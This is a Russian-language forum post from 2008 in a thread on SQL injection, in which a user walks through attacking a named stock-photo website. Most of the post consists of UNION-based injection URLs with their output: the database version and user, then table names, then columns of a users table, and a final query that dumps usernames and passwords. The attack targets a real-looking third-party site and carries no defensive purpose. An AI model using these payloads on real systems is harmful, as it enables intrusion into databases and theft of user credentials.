Тема: SQL Инъекции
Показать сообщение отдельно

  #5907  
Старый 07.07.2008, 07:57
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию
www.photo.buyyourstockphotos.com
Цитата:
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--
version(): 5.0.51a-3ubuntu5.1
user(): buystock@localhost
database(): buystock

file_priv к сожалению нет..
так как версия пятая, то есть база information_schema.. из нее берем названия таблиц:
Цитата:
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from +information_schema.tables+limit+1,1--
есть табличка users.. смотрим какие в ней колонки
Цитата:
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+information_schema.columns+where+table_name=0x75 73657273+limit+1,1--
и делаем вывод из таблицы
Цитата:
http://www.photo.buyyourstockphotos.com/user.html?uid=-5+union+select+1,concat_ws(0x3a3a,user,pass),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27+from+buystock.users--
все очень просто=)
 
Ответить с цитированием